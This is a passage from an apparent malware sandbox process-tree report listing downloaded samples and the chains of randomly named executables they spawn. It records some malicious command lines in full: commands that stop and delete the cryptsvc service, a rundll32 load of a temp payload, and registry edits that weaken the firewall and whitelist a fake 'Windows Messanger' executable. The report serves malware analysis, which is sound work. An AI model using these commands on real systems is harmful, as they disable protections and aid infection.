        11⤵
        
        PID:8572
        
        \??\c:\vjppj.exe
        
        c:\vjppj.exe
        12⤵
        
        PID:9692
        
        \??\c:\7ppdj.exe
        
        c:\7ppdj.exe
        13⤵
        
        PID:11200
        
        \??\c:\nbtttb.exe
        
        c:\nbtttb.exe
        14⤵
        
        PID:4108
        
        \??\c:\vjpjj.exe
        
        c:\vjpjj.exe
        15⤵
        
        PID:14144
        
        \??\c:\ddvvj.exe
        
        c:\ddvvj.exe
        16⤵
        
        PID:13736
        
        \??\c:\3nbttt.exe
        
        c:\3nbttt.exe
        17⤵
        
        PID:18216
        
        \??\c:\hbbttt.exe
        
        c:\hbbttt.exe
        18⤵
        
        PID:15048
- - C:\Users\Admin\Downloads\241002-x9jz4awgnb9a9a50285f8598efe27b22c0292750aa736b91dfbcfc590bdd0119d6519d861eN.exe
    C:\Users\Admin\Downloads\241002-x9jz4awgnb9a9a50285f8598efe27b22c0292750aa736b91dfbcfc590bdd0119d6519d861eN.exe
    3⤵
    PID:1072
  - - C:\Windows\SysWOW64\Kglmio32.exe
      C:\Windows\system32\Kglmio32.exe
      4⤵
      PID:7320
    - - C:\Windows\SysWOW64\Lggldm32.exe
        
        C:\Windows\system32\Lggldm32.exe
        5⤵
        
        PID:8024
      - C:\Windows\SysWOW64\Mgclpkac.exe
        
        C:\Windows\system32\Mgclpkac.exe
        6⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\Njmhhefi.exe
        
        C:\Windows\system32\Njmhhefi.exe
        7⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\Oelolmnd.exe
        
        C:\Windows\system32\Oelolmnd.exe
        8⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\Pmcclm32.exe
        
        C:\Windows\system32\Pmcclm32.exe
        9⤵
        
        PID:8892
        
        C:\Windows\SysWOW64\Cdlqqcnl.exe
        
        C:\Windows\system32\Cdlqqcnl.exe
        10⤵
        
        PID:8272
- - C:\Users\Admin\Downloads\241002-yf49lsxbka0c377447f098f43601e8c21609c41e1c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-yf49lsxbka0c377447f098f43601e8c21609c41e1c_JaffaCakes118.exe
    3⤵
    PID:1816
  - - C:\Users\Admin\Downloads\241002-yf49lsxbka0c377447f098f43601e8c21609c41e1c_JaffaCakes118.exe
      C:\Users\Admin\Downloads\241002-yf49lsxbka0c377447f098f43601e8c21609c41e1c_JaffaCakes118.exe
      4⤵
      PID:4528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 456
      4⤵
      Program crash
      PID:8160
- - C:\Users\Admin\Downloads\241002-x5rt5swfkcc9738484de8c19433810c0565dbd0cfb70f9226d84f23e49775b8e610c2b6115N.exe
    C:\Users\Admin\Downloads\241002-x5rt5swfkcc9738484de8c19433810c0565dbd0cfb70f9226d84f23e49775b8e610c2b6115N.exe
    3⤵
    PID:7068
  - - C:\Windows\SysWOW64\Njinmf32.exe
      C:\Windows\system32\Njinmf32.exe
      4⤵
      PID:6508
    - - C:\Windows\SysWOW64\Oldjcg32.exe
        
        C:\Windows\system32\Oldjcg32.exe
        5⤵
        
        PID:7972
      - C:\Windows\SysWOW64\Pkegpb32.exe
        
        C:\Windows\system32\Pkegpb32.exe
        6⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\Clchbqoo.exe
        
        C:\Windows\system32\Clchbqoo.exe
        7⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\Dnbakghm.exe
        
        C:\Windows\system32\Dnbakghm.exe
        8⤵
        
        PID:7196
        
        C:\Windows\SysWOW64\Fnlmhc32.exe
        
        C:\Windows\system32\Fnlmhc32.exe
        9⤵
        
        PID:7700
        
        C:\Windows\SysWOW64\Gejopl32.exe
        
        C:\Windows\system32\Gejopl32.exe
        10⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\Gojiiafp.exe
        
        C:\Windows\system32\Gojiiafp.exe
        11⤵
        
        PID:960
        
        C:\Windows\SysWOW64\Jgbchj32.exe
        
        C:\Windows\system32\Jgbchj32.exe
        12⤵
        
        PID:8852
- - C:\Users\Admin\Downloads\241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118.exe
    3⤵
    PID:6080
- - C:\Users\Admin\Downloads\241002-x4yw3asfjr39a5fd9d0b7f3b4c833e085c35edaee56a4185d7e9a36fe6223c8a62cb9a1b3bN.exe
    C:\Users\Admin\Downloads\241002-x4yw3asfjr39a5fd9d0b7f3b4c833e085c35edaee56a4185d7e9a36fe6223c8a62cb9a1b3bN.exe
    3⤵
    PID:6588
  - - C:\Program Files (x86)\b906ba96\jusched.exe
      "C:\Program Files (x86)\b906ba96\jusched.exe"
      4⤵
      PID:8220
- - C:\Users\Admin\Downloads\241002-ygltnaxblg286d4a2c609ad047f7de53bdb1cc4a674f8e4bb3e18adcbf7621a42eedfab2aaN.exe
    C:\Users\Admin\Downloads\241002-ygltnaxblg286d4a2c609ad047f7de53bdb1cc4a674f8e4bb3e18adcbf7621a42eedfab2aaN.exe
    3⤵
    PID:7584
  - - C:\Windows\SysWOW64\Pmlmkn32.exe
      C:\Windows\system32\Pmlmkn32.exe
      4⤵
      PID:8528
    - - C:\Windows\SysWOW64\Aojefobm.exe
        
        C:\Windows\system32\Aojefobm.exe
        5⤵
        
        PID:4268
      - C:\Windows\SysWOW64\Ddjmba32.exe
        
        C:\Windows\system32\Ddjmba32.exe
        6⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\Ebnfbcbc.exe
        
        C:\Windows\system32\Ebnfbcbc.exe
        7⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\Hoobdp32.exe
        
        C:\Windows\system32\Hoobdp32.exe
        8⤵
        
        PID:8744
        
        C:\Windows\SysWOW64\Jgbchj32.exe
        
        C:\Windows\system32\Jgbchj32.exe
        9⤵
        
        PID:4228
- - C:\Users\Admin\Downloads\241002-x2331awejg0800f3af24341134160def366d5633ae57fa6645160d19a2cc895d0fdf408573N.exe
    C:\Users\Admin\Downloads\241002-x2331awejg0800f3af24341134160def366d5633ae57fa6645160d19a2cc895d0fdf408573N.exe
    3⤵
    PID:7952
  - - C:\Windows\SysWOW64\Ponfka32.exe
      C:\Windows\system32\Ponfka32.exe
      4⤵
      PID:8808
    - - C:\Windows\SysWOW64\Aehgnied.exe
        
        C:\Windows\system32\Aehgnied.exe
        5⤵
        
        PID:5340
      - C:\Windows\SysWOW64\Dkokcl32.exe
        
        C:\Windows\system32\Dkokcl32.exe
        6⤵
        
        PID:7424
- - C:\Users\Admin\Downloads\241002-xyl1basdjl84e2264ae1c491923a55140de226fa8769a9e1fe856b56ba909376ad04e8ee7eN.exe
    C:\Users\Admin\Downloads\241002-xyl1basdjl84e2264ae1c491923a55140de226fa8769a9e1fe856b56ba909376ad04e8ee7eN.exe
    3⤵
    PID:8420
- - C:\Users\Admin\Downloads\241002-yd7xqataqn0c34cca4d5a99b903bce88ec2fa5f676_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-yd7xqataqn0c34cca4d5a99b903bce88ec2fa5f676_JaffaCakes118.exe
    3⤵
    PID:9148
- - C:\Users\Admin\Downloads\241002-xvvhaasbnn0c1d1d4b0e1285513a411b01e96a53c9_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xvvhaasbnn0c1d1d4b0e1285513a411b01e96a53c9_JaffaCakes118.exe
    3⤵
    PID:8480
- - C:\Users\Admin\Downloads\241002-xxxenascpj0c1fe0de251265d688da8f8e116d0e6e_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xxxenascpj0c1fe0de251265d688da8f8e116d0e6e_JaffaCakes118.exe
    3⤵
    PID:6956
  - - C:\Windows\SysWOW64\net.exe
      net stop cryptsvc
      4⤵
      PID:4564
  - - C:\Windows\SysWOW64\sc.exe
      sc config cryptsvc start= disabled
      4⤵
      Launches sc.exe
      PID:3128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete cryptsvc
      4⤵
      Launches sc.exe
      PID:5044
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Users\Admin\AppData\Local\Temp\1727898595.dat, ServerMain c:\users\admin\downloads\241002-xxxenascpj0c1fe0de251265d688da8f8e116d0e6e_jaffacakes118.exe
      4⤵
      PID:3176
- - C:\Users\Admin\Downloads\241002-x9sbgashjj0c2db1cb22cf8b76f1982f98e40bec81_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x9sbgashjj0c2db1cb22cf8b76f1982f98e40bec81_JaffaCakes118.exe
    3⤵
    PID:6940
- - C:\Users\Admin\Downloads\241002-x2ds4swdqb771e6e9843cb35a2766c2894d0054c77c6e048a1dec2759ec48ec189382b94c8N.exe
    C:\Users\Admin\Downloads\241002-x2ds4swdqb771e6e9843cb35a2766c2894d0054c77c6e048a1dec2759ec48ec189382b94c8N.exe
    3⤵
    PID:8456
- - C:\Users\Admin\Downloads\241002-xy925ssdkp7dc62578c495c36002d31672e105bdf722159d920a2cd997a6347bbf187cd1f8N.exe
    C:\Users\Admin\Downloads\241002-xy925ssdkp7dc62578c495c36002d31672e105bdf722159d920a2cd997a6347bbf187cd1f8N.exe
    3⤵
    PID:8256
  - - C:\Windows\SysWOW64\Glipgf32.exe
      C:\Windows\system32\Glipgf32.exe
      4⤵
      PID:5300
    - - C:\Windows\SysWOW64\Hehkajig.exe
        
        C:\Windows\system32\Hehkajig.exe
        5⤵
        
        PID:4636
      - C:\Windows\SysWOW64\Jokkgl32.exe
        
        C:\Windows\system32\Jokkgl32.exe
        6⤵
        
        PID:1924
- - C:\Users\Admin\Downloads\241002-xwhvwasbrl992910371d2908d8b7d7fcc1181a3d076313252710350ed46a89dffb04b55171N.exe
    C:\Users\Admin\Downloads\241002-xwhvwasbrl992910371d2908d8b7d7fcc1181a3d076313252710350ed46a89dffb04b55171N.exe
    3⤵
    PID:8224
  - - C:\Windows\SysWOW64\Gemkelcd.exe
      C:\Windows\system32\Gemkelcd.exe
      4⤵
      PID:5940
    - - C:\Windows\SysWOW64\Iepaaico.exe
        
        C:\Windows\system32\Iepaaico.exe
        5⤵
        
        PID:9732
      - C:\Windows\SysWOW64\Jlgepanl.exe
        
        C:\Windows\system32\Jlgepanl.exe
        6⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\Mogcihaj.exe
        
        C:\Windows\system32\Mogcihaj.exe
        7⤵
        
        PID:8640
        
        C:\Windows\SysWOW64\Mfnhfm32.exe
        
        C:\Windows\system32\Mfnhfm32.exe
        8⤵
        
        PID:12792
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        9⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\Jeneidji.exe
        
        C:\Windows\system32\Jeneidji.exe
        10⤵
        
        PID:8092
        
        C:\Windows\SysWOW64\Ghgljg32.exe
        
        C:\Windows\system32\Ghgljg32.exe
        11⤵
        
        PID:8916
- - C:\Users\Admin\Downloads\241002-x3gw6awelcca236621bc9b2f3e40c845ef2164b0270c4cdfb56da732e3dfe207f77b6ca065N.exe
    C:\Users\Admin\Downloads\241002-x3gw6awelcca236621bc9b2f3e40c845ef2164b0270c4cdfb56da732e3dfe207f77b6ca065N.exe
    3⤵
    PID:9116
  - - C:\Windows\SysWOW64\Lncjlq32.exe
      C:\Windows\system32\Lncjlq32.exe
      4⤵
      PID:12032
    - - C:\Windows\SysWOW64\Bphgeo32.exe
        
        C:\Windows\system32\Bphgeo32.exe
        5⤵
        
        PID:2488
      - C:\Windows\SysWOW64\Mjidgkog.exe
        
        C:\Windows\system32\Mjidgkog.exe
        6⤵
        
        PID:12872
        
        C:\Windows\SysWOW64\Oifppdpd.exe
        
        C:\Windows\system32\Oifppdpd.exe
        7⤵
        
        PID:14132
        
        C:\Windows\SysWOW64\Kkpnga32.exe
        
        C:\Windows\system32\Kkpnga32.exe
        8⤵
        
        PID:12680
        
        C:\Windows\SysWOW64\Igjlibib.exe
        
        C:\Windows\system32\Igjlibib.exe
        9⤵
        
        PID:7720
        
        C:\Windows\SysWOW64\Efhjjcpo.exe
        
        C:\Windows\system32\Efhjjcpo.exe
        10⤵
        
        PID:15312
- - C:\Users\Admin\Downloads\241002-xvz3rswarh3a1d8239be880b6a8d3f037e7d66c5f84fb562cc262a9b9fbce2dfa278500dfdN.exe
    C:\Users\Admin\Downloads\241002-xvz3rswarh3a1d8239be880b6a8d3f037e7d66c5f84fb562cc262a9b9fbce2dfa278500dfdN.exe
    3⤵
    PID:8896
  - - C:\Windows\SysWOW64\Jgbchj32.exe
      C:\Windows\system32\Jgbchj32.exe
      4⤵
      PID:1776
    - - C:\Windows\SysWOW64\Pjbcplpe.exe
        
        C:\Windows\system32\Pjbcplpe.exe
        5⤵
        
        PID:9584
      - C:\Windows\SysWOW64\Mhldbh32.exe
        
        C:\Windows\system32\Mhldbh32.exe
        6⤵
        
        PID:12812
        
        C:\Windows\SysWOW64\Ojcpdg32.exe
        
        C:\Windows\system32\Ojcpdg32.exe
        7⤵
        
        PID:14088
        
        C:\Windows\SysWOW64\Kbgfhnhi.exe
        
        C:\Windows\system32\Kbgfhnhi.exe
        8⤵
        
        PID:16380
        
        C:\Windows\SysWOW64\Pecpknke.exe
        
        C:\Windows\system32\Pecpknke.exe
        9⤵
        
        PID:17200
- - C:\Users\Admin\Downloads\241002-ygk75atbqp0c38649585fdd977d0f0b081865afdf5_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ygk75atbqp0c38649585fdd977d0f0b081865afdf5_JaffaCakes118.exe
    3⤵
    PID:6156
- - C:\Users\Admin\Downloads\241002-x2e16ssekq0c23ccb174c3bbaee427012fe4299fe7_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x2e16ssekq0c23ccb174c3bbaee427012fe4299fe7_JaffaCakes118.exe
    3⤵
    PID:5524
  - - C:\Users\Admin\Downloads\241002-x2e16ssekq0c23ccb174c3bbaee427012fe4299fe7_JaffaCakes118.exe
      "C:\Users\Admin\Downloads\241002-x2e16ssekq0c23ccb174c3bbaee427012fe4299fe7_JaffaCakes118.exe"
      4⤵
      PID:11184
- - C:\Users\Admin\Downloads\241002-x1tg6swdnc35793b24507e77c187b1fc6ba8db03bf334a41f39677f4a1adacc8780dca6ba7N.exe
    C:\Users\Admin\Downloads\241002-x1tg6swdnc35793b24507e77c187b1fc6ba8db03bf334a41f39677f4a1adacc8780dca6ba7N.exe
    3⤵
    PID:8544
  - - C:\Windows\SysWOW64\Lgibpf32.exe
      C:\Windows\system32\Lgibpf32.exe
      4⤵
      PID:12012
    - - C:\Windows\SysWOW64\Bphgeo32.exe
        
        C:\Windows\system32\Bphgeo32.exe
        5⤵
        
        PID:1064
      - C:\Windows\SysWOW64\Mjidgkog.exe
        
        C:\Windows\system32\Mjidgkog.exe
        6⤵
        
        PID:12892
        
        C:\Windows\SysWOW64\Khihld32.exe
        
        C:\Windows\system32\Khihld32.exe
        7⤵
        
        PID:8996
        
        C:\Windows\SysWOW64\Jjdgal32.exe
        
        C:\Windows\system32\Jjdgal32.exe
        8⤵
        
        PID:11116
        
        C:\Windows\SysWOW64\Efhjjcpo.exe
        
        C:\Windows\system32\Efhjjcpo.exe
        9⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\Pjlnhi32.exe
        
        C:\Windows\system32\Pjlnhi32.exe
        10⤵
        
        PID:8872
- - C:\Users\Admin\Downloads\241002-xq9rea1hqn0c1787cf3bfff00412b2f4b81d0e3b7a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xq9rea1hqn0c1787cf3bfff00412b2f4b81d0e3b7a_JaffaCakes118.exe
    3⤵
    PID:8812
- - C:\Users\Admin\Downloads\241002-xy5gnawcpb9c538d3ddd9eeeb5193206dbd84fb80cb915c4c9246b99211a2870766ec3ec12N.exe
    C:\Users\Admin\Downloads\241002-xy5gnawcpb9c538d3ddd9eeeb5193206dbd84fb80cb915c4c9246b99211a2870766ec3ec12N.exe
    3⤵
    PID:9012
  - - C:\Windows\SysWOW64\Lobjni32.exe
      C:\Windows\system32\Lobjni32.exe
      4⤵
      PID:11992
    - - C:\Windows\SysWOW64\Baegibae.exe
        
        C:\Windows\system32\Baegibae.exe
        5⤵
        
        PID:10272
      - C:\Windows\SysWOW64\Mledmg32.exe
        
        C:\Windows\system32\Mledmg32.exe
        6⤵
        
        PID:12512
        
        C:\Windows\SysWOW64\Qfmfefni.exe
        
        C:\Windows\system32\Qfmfefni.exe
        7⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\Klmnkdal.exe
        
        C:\Windows\system32\Klmnkdal.exe
        8⤵
        
        PID:12596
        
        C:\Windows\SysWOW64\Pkmhgh32.exe
        
        C:\Windows\system32\Pkmhgh32.exe
        9⤵
        
        PID:17288
        
        C:\Windows\SysWOW64\Nnoefagj.exe
        
        C:\Windows\system32\Nnoefagj.exe
        10⤵
        
        PID:13204
        
        C:\Windows\SysWOW64\Jglkkiea.exe
        
        C:\Windows\system32\Jglkkiea.exe
        11⤵
        
        PID:7128
- - C:\Users\Admin\Downloads\241002-x6wjqasfrp681f92a794c2dcfa56bca1eab50cdeb7abd7d0ca571a7b52974f29ad6714fd10N.exe
    C:\Users\Admin\Downloads\241002-x6wjqasfrp681f92a794c2dcfa56bca1eab50cdeb7abd7d0ca571a7b52974f29ad6714fd10N.exe
    3⤵
    PID:3520
- - C:\Users\Admin\Downloads\241002-yafdasshlr98767f8c7bcf9419a5a520f0a43f5fbec13d252dcf2a9b06bf708e31b7ced2ceN.exe
    C:\Users\Admin\Downloads\241002-yafdasshlr98767f8c7bcf9419a5a520f0a43f5fbec13d252dcf2a9b06bf708e31b7ced2ceN.exe
    3⤵
    PID:9100
  - - C:\Windows\SysWOW64\Lmdnbn32.exe
      C:\Windows\system32\Lmdnbn32.exe
      4⤵
      PID:11972
    - - C:\Windows\SysWOW64\Bmjkic32.exe
        
        C:\Windows\system32\Bmjkic32.exe
        5⤵
        
        PID:10332
      - C:\Windows\SysWOW64\Mhldbh32.exe
        
        C:\Windows\system32\Mhldbh32.exe
        6⤵
        
        PID:12824
        
        C:\Windows\SysWOW64\Ofgdcipq.exe
        
        C:\Windows\system32\Ofgdcipq.exe
        7⤵
        
        PID:14048
        
        C:\Windows\SysWOW64\Kopcbo32.exe
        
        C:\Windows\system32\Kopcbo32.exe
        8⤵
        
        PID:7292
- - C:\Users\Admin\Downloads\241002-yb75pstajrfae52ee84a8697a2e6814f4d29f404ba61d95a8c3646d67461b59de9a3ae2075N.exe
    C:\Users\Admin\Downloads\241002-yb75pstajrfae52ee84a8697a2e6814f4d29f404ba61d95a8c3646d67461b59de9a3ae2075N.exe
    3⤵
    PID:3112
  - - C:\Windows\SysWOW64\Lmdnbn32.exe
      C:\Windows\system32\Lmdnbn32.exe
      4⤵
      PID:11964
    - - C:\Windows\SysWOW64\Bogkmgba.exe
        
        C:\Windows\system32\Bogkmgba.exe
        5⤵
        
        PID:10428
      - C:\Windows\SysWOW64\Mablfnne.exe
        
        C:\Windows\system32\Mablfnne.exe
        6⤵
        
        PID:12580
        
        C:\Windows\SysWOW64\Qjhbfd32.exe
        
        C:\Windows\system32\Qjhbfd32.exe
        7⤵
        
        PID:9908
        
        C:\Windows\SysWOW64\Klmnkdal.exe
        
        C:\Windows\system32\Klmnkdal.exe
        8⤵
        
        PID:12500
        
        C:\Windows\SysWOW64\Pbimjb32.exe
        
        C:\Windows\system32\Pbimjb32.exe
        9⤵
        
        PID:9740
        
        C:\Windows\SysWOW64\Kfkamk32.exe
        
        C:\Windows\system32\Kfkamk32.exe
        10⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\Ignnjk32.exe
        
        C:\Windows\system32\Ignnjk32.exe
        11⤵
        
        PID:18412
- - C:\Users\Admin\Downloads\241002-x3mseasepk59000d760c9f2da0267c3019dc55d99228e5c00746419ff3a90af0bc4533f617N.exe
    C:\Users\Admin\Downloads\241002-x3mseasepk59000d760c9f2da0267c3019dc55d99228e5c00746419ff3a90af0bc4533f617N.exe
    3⤵
    PID:8964
  - - C:\Windows\SysWOW64\Lnangaoa.exe
      C:\Windows\system32\Lnangaoa.exe
      4⤵
      PID:11480
    - - C:\Windows\SysWOW64\Mledmg32.exe
        
        C:\Windows\system32\Mledmg32.exe
        5⤵
        
        PID:12536
- - C:\Users\Admin\Downloads\241002-xysg4asdjp0c20fcbb79b95635eac8c5e6bd5141de_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xysg4asdjp0c20fcbb79b95635eac8c5e6bd5141de_JaffaCakes118.exe
    3⤵
    PID:3000
- - C:\Users\Admin\Downloads\241002-xp8sqavgpd050b9c225e49ccecf2b81d3db315c6d98c351b379e047619753a8e7c807f8225N.exe
    C:\Users\Admin\Downloads\241002-xp8sqavgpd050b9c225e49ccecf2b81d3db315c6d98c351b379e047619753a8e7c807f8225N.exe
    3⤵
    PID:7940
  - - C:\Windows\SysWOW64\Ljeafb32.exe
      C:\Windows\system32\Ljeafb32.exe
      4⤵
      PID:11500
    - - C:\Windows\SysWOW64\Ddifgk32.exe
        
        C:\Windows\system32\Ddifgk32.exe
        5⤵
        
        PID:8016
      - C:\Windows\SysWOW64\Nmaciefp.exe
        
        C:\Windows\system32\Nmaciefp.exe
        6⤵
        
        PID:13528
        
        C:\Windows\SysWOW64\Kdkoef32.exe
        
        C:\Windows\system32\Kdkoef32.exe
        7⤵
        
        PID:10184
        
        C:\Windows\SysWOW64\Pmoagk32.exe
        
        C:\Windows\system32\Pmoagk32.exe
        8⤵
        
        PID:8208
        
        C:\Windows\SysWOW64\Lhjnfn32.exe
        
        C:\Windows\system32\Lhjnfn32.exe
        9⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\Icklhnop.exe
        
        C:\Windows\system32\Icklhnop.exe
        10⤵
        
        PID:18204
- - C:\Users\Admin\Downloads\241002-x6kgfswfmc0c2919e4daa667f93706205a575fa5e0_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x6kgfswfmc0c2919e4daa667f93706205a575fa5e0_JaffaCakes118.exe
    3⤵
    PID:7424
  - - C:\Windows\SysWOW64\ntdbg.exe
      C:\Windows\system32\ntdbg.exe c:\windows\system\explorer.exe
      4⤵
      PID:12096
- - C:\Users\Admin\Downloads\241002-xyvbpawcna702ff46078b6eed8aa8a38eca4fb899d7fbef0054aeb948aed65ddf67a5a4b1cN.exe
    C:\Users\Admin\Downloads\241002-xyvbpawcna702ff46078b6eed8aa8a38eca4fb899d7fbef0054aeb948aed65ddf67a5a4b1cN.exe
    3⤵
    PID:7240
- - C:\Users\Admin\Downloads\241002-xn3v3s1grl66fce7980ab76stealc5.exe
    C:\Users\Admin\Downloads\241002-xn3v3s1grl66fce7980ab76stealc5.exe
    3⤵
    PID:8272
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1716
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:10084
- - C:\Users\Admin\Downloads\241002-xl26rs1gjn0c108aa44f7596b369bc9278c400788d_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xl26rs1gjn0c108aa44f7596b369bc9278c400788d_JaffaCakes118.exe
    3⤵
    PID:9048
- - C:\Users\Admin\Downloads\241002-yadjpsshlm166af76cec7a249d017d0265ac6cf859be14b3b1a60e449bb668dfe3005f5479N.exe
    C:\Users\Admin\Downloads\241002-yadjpsshlm166af76cec7a249d017d0265ac6cf859be14b3b1a60e449bb668dfe3005f5479N.exe
    3⤵
    PID:7672
- - C:\Users\Admin\Downloads\241002-ybmtrsshqr0c30f5387b96fe0004910ebbb8471311_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ybmtrsshqr0c30f5387b96fe0004910ebbb8471311_JaffaCakes118.exe
    3⤵
    PID:3488
- - C:\Users\Admin\Downloads\241002-xpsfqs1hkj04a7c34fb0d8c1e732660fd570a011d95706c157996b63a7e1b97eb031b97faeN.exe
    C:\Users\Admin\Downloads\241002-xpsfqs1hkj04a7c34fb0d8c1e732660fd570a011d95706c157996b63a7e1b97eb031b97faeN.exe
    3⤵
    PID:7428
  - - \??\c:\bhnbth.exe
      c:\bhnbth.exe
      4⤵
      PID:11096
    - - \??\c:\xfxrxfx.exe
        
        c:\xfxrxfx.exe
        5⤵
        
        PID:10692
      - \??\c:\fffxlfx.exe
        
        c:\fffxlfx.exe
        6⤵
        
        PID:13768
        
        \??\c:\djjvj.exe
        
        c:\djjvj.exe
        7⤵
        
        PID:10696
        
        \??\c:\1hnhbh.exe
        
        c:\1hnhbh.exe
        8⤵
        
        PID:7064
        
        \??\c:\hthbth.exe
        
        c:\hthbth.exe
        9⤵
        
        PID:15656
        
        \??\c:\dvvpp.exe
        
        c:\dvvpp.exe
        10⤵
        
        PID:14928
- - C:\Users\Admin\Downloads\241002-xyamaascqq724a6fe0b69f8dc21aa902ca2a0129282eeaad6f70eabdfbb306823936e69163N.exe
    C:\Users\Admin\Downloads\241002-xyamaascqq724a6fe0b69f8dc21aa902ca2a0129282eeaad6f70eabdfbb306823936e69163N.exe
    3⤵
    PID:5272
  - - C:\Windows\SysWOW64\Lnoaaaad.exe
      C:\Windows\system32\Lnoaaaad.exe
      4⤵
      PID:11628
    - - C:\Windows\SysWOW64\Bhmbqm32.exe
        
        C:\Windows\system32\Bhmbqm32.exe
        5⤵
        
        PID:10508
      - C:\Windows\SysWOW64\Mjggal32.exe
        
        C:\Windows\system32\Mjggal32.exe
        6⤵
        
        PID:12464
        
        C:\Windows\SysWOW64\Kbjbnnfg.exe
        
        C:\Windows\system32\Kbjbnnfg.exe
        7⤵
        
        PID:13144
        
        C:\Windows\SysWOW64\Memalfcb.exe
        
        C:\Windows\system32\Memalfcb.exe
        8⤵
        
        PID:12140
        
        C:\Windows\SysWOW64\Ljijci32.exe
        
        C:\Windows\system32\Ljijci32.exe
        9⤵
        
        PID:16720
        
        C:\Windows\SysWOW64\Hladlc32.exe
        
        C:\Windows\system32\Hladlc32.exe
        10⤵
        
        PID:4084
- - C:\Users\Admin\Downloads\241002-xz23xssdnqa2a58b4698503d09adbb4c8654142bd30ba1e9d80acf1aa893fa34c7a552fce5N.exe
    C:\Users\Admin\Downloads\241002-xz23xssdnqa2a58b4698503d09adbb4c8654142bd30ba1e9d80acf1aa893fa34c7a552fce5N.exe
    3⤵
    PID:6444
- - C:\Users\Admin\Downloads\241002-yg7fcsxbnb8e13ac5062802f3cfc01f9115cb537ec4e7acd7860126c63f7b2360b52415a86N.exe
    C:\Users\Admin\Downloads\241002-yg7fcsxbnb8e13ac5062802f3cfc01f9115cb537ec4e7acd7860126c63f7b2360b52415a86N.exe
    3⤵
    PID:7520
  - - C:\Windows\SysWOW64\Lfgipd32.exe
      C:\Windows\system32\Lfgipd32.exe
      4⤵
      PID:11048
- - C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe
    3⤵
    PID:7604
  - - C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe
      "C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe"
      4⤵
      PID:11268
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:10644
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe" /t REG_SZ /d "C:\Users\Admin\Downloads\241002-x1xvlasdrp0c235dc381693f1d98b7a4feb44fd34c_JaffaCakes118.exe:*:Enabled:Windows Messanger" /f
        5⤵
        
        PID:13540
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:12808
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\k.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\k.exe:*:Enabled:Windows Messanger" /f
        5⤵
        
        PID:8920
- - C:\Users\Admin\Downloads\241002-xzacxasdkq0c2180aa5d54bf8de7389ee8a8350efa_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xzacxasdkq0c2180aa5d54bf8de7389ee8a8350efa_JaffaCakes118.exe
    3⤵
    PID:5204
  - - C:\Users\Admin\Downloads\241002-xzacxasdkq0c2180aa5d54bf8de7389ee8a8350efa_JaffaCakes118.exe
      C:\Users\Admin\Downloads\241002-xzacxasdkq0c2180aa5d54bf8de7389ee8a8350efa_JaffaCakes118.exe
      4⤵
      PID:1740
